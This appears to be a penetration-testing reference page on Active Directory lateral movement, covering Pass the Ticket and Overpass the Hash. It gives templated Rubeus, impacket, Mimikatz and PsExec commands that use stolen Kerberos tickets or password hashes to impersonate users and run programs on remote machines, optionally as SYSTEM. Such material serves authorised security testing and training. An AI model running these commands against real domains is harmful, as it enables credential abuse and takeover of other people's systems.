Lateral Movement

Introduction

In this section, you will find some techniques in order to perform lateral movements on Active Directory infrastructuree.

Pass The Ticket (PTT)

In the Pass the Ticket technique, an attacker obtains a valid Kerberos ticket-granting ticket (TGT) by stealing it from a user or extracting it from a computer's memory. The attacker can then use this TGT to request additional service tickets without the need for any further authentication.

You can perform this technique with Rubeus.

.\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:<DOMAIN> /username:<USERNAME> /password:FakePass123 /ticket:<TICKET>

Depending on the obtained TGS you, will only be able to perform specific tasks.

Tickets - Techniques

Service TypeRequired Tickets

Windows File Share (PsExec)

CIFS

LDAP Operations (DSync)

LDAP

WinRM

HOST HTTP WINRM

WMI

HOST RPCSS

Powershell Remoting

HOST HTTP Depending on OS: WSMAN RPCSS

Schedule Taks

Host

Windows Remote Server Administration Tools

RPCSS LDAP CIFS

Golden Tickets

krbtgt

Overpass The Hash (OTH)

This technique allows a user to request a Kerberos TGT using its NTLM or AES/RC4 hash.

  • Alternative 1 - Without HIGH privileges

# Alternative 1
.\Rubeus.exe asktgt /nowrap /user:<USER> [/dc:<DC_IP>] [/ntlm:<HASH_NTLM>|/aes256:<AES256_KEY>|/rc4:<RC4_KEY>] [/opsec|/force] /ptt 
# Alternative 2
impacket-getTGT <DOMAIN>/<USERSNAME>[:password] -dc-ip <DC_IP> -hashes LMHASH:NTHASH
  • Alterntative 2 - Requires HIGH privileges

[.\Mimikatz.exe | .\SafetyKatz.exe ] "sekurlsa::pth /user:<USER2IMPERSONATE> /domain:<DOMAIN> [/ntlm:<HASH_NTLM>|/aes256:<AES256_KEY>|/rc4:<RC4_KEY>] /run:[cmd.exe | powershell.exe]" "exit"

Then, you can use PsExec to access the machine, if the user has administrator privileges.

ℹī¸The -s argument is to upgrade to "nt authority\system", but it will only work if you are going to connect as a highly privileged user.

# Alternative 1
.\PsExec.exe /accepteula [-s] \\<COMPUTER_NAME> <PROGRAM>
# Alternative 2
export KRB5CCNAME=<PATH_TICKET.ccache>
impacket-psexec -k -no-pass [[domain/]username@]<COMPUTER_NAME> -dc-ip <DC-IP> [-c <PROGRAM.EXE>]

S4U2Self Abuse (Constrained Delegation)

The exploitation is seen on the Kerberos exploitation phase.

Alternate Service Name (Constrained Delegation)

The exploitation is seen on the Kerberos exploitation phase.

References

Last updated